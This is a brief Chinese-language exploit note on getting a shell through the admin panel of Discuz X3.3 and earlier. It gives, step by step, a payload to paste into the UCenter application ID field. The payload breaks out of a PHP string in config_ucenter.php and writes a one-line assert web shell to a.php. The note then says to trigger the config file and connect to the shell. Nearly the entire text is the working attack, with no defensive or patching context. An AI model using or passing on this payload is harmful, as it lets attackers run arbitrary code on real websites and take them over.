discuz 后台 getshell

适用于 Discuz X3.3 及之前版本

站长 - Ucenter 设置 - Ucenter 应用 ID

填入代码

123');file_put_contents('a.php','<?php assert($_POST[a])?>');//

保存

本地查看 config_ucenter.php

访问 /config/config_ucenter.php

空白

file_put_contents 执行成功

连接 a.php